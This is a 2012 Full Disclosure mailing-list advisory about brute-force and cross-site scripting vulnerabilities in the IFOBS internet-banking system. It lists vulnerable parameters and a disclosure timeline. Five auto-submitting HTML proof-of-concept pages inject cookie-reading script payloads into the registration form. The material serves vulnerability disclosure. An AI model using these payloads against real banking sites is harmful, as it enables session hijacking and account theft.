Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

BF and XSS vulnerabilities in IFOBS

From: "MustLive" <mustlive () websecurity com ua>
Date: Wed, 19 Sep 2012 16:41:23 +0300
Hello list!

I want to warn you about Brute Force and Cross-Site Scripting 
vulnerabilities in system IFOBS.

IFOBS - it's Internet-banking system, which is widespread and particularly 
it's used by large number of Ukrainian banks.

These are the next 36 vulnerabilities in IFOBS: 2 BF and 34 XSS (in the 
first advisory there were 38 vulnerabilities).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of IFOBS. The developers have ignored and not 
fixed these vulnerabilities (all holes from three advisories).

----------
Details:
----------

Brute Force (WASC-11):

In login form of certificates console 
(http://site/ifobsClient/certmasterlogin.jsp) there is no protection against 
picking up password (captcha).

In forms of checking registration status and editing of registration profile 
there are no protection against picking up password (captcha). Both forms 
are at page http://site/ifobsClient/regclientmain.jsp (they also can be 
accessed by addresses 
http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForStatus and 
http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForEdit) and 
they use the same script.

Cross-Site Scripting (WASC-08):

POST request at page http://site/ifobsClient/regclientmain.jsp in 
parameters: furtherAction, secondName, firstName, thirdName, BirthDay, 
BirthMonth, BirthYear, address, livePlace, passportSerial, passportNumber, 
PassportDay, PassportMonth, PassportYear, passportIssueAgency, 
tempDocSerial, tempDocNumber, DocDay, DocMonth, DocYear, idCodeNumber, 
CodeRegDay, CodeRegMonth, CodeRegYear, idCodeRegPlace, phone, email, 
pmcountry, pmnumber, keyword, password, bankAddress, bankContacts, 
typeclient.

Exploits for the first five vulnerabilities (in parameters furtherAction, 
secondName, firstName, thirdName, BirthDay):

IFOBS XSS-6.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp"; 
method="post">
<input type="hidden" name="login" value="111111">
<input type="hidden" name="id" value="1111">
<input type="hidden" name="myaction" value="login">
<input type="hidden" name="furtherAction" 
value='"><script>alert(document.cookie)</script>'>
</form>
</body>
</html>

IFOBS XSS-7.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp"; 
method="post">
<input type="hidden" name="secondName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-8.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp"; 
method="post">
<input type="hidden" name="firstName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-9.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp"; 
method="post">
<input type="hidden" name="thirdName" 
value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-10.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp"; 
method="post">
<input type="hidden" name="BirthDay" 
value='</script><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

------------
Timeline:
------------ 

2012.05.04 - found vulnerabilities during pentest. After I've informed my 
client, he could inform the developers.
2012.05.29 - announced at my site.
2012.06.01 - informed the developers about vulnerabilities (the first 
advisory).
2012.06.01 - informed the developers about vulnerabilities (the second 
advisory).
2012.06.02 - informed the developers about vulnerabilities (the third 
advisory).
2012.09.18 - disclosed at my site (http://websecurity.com.ua/5859/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: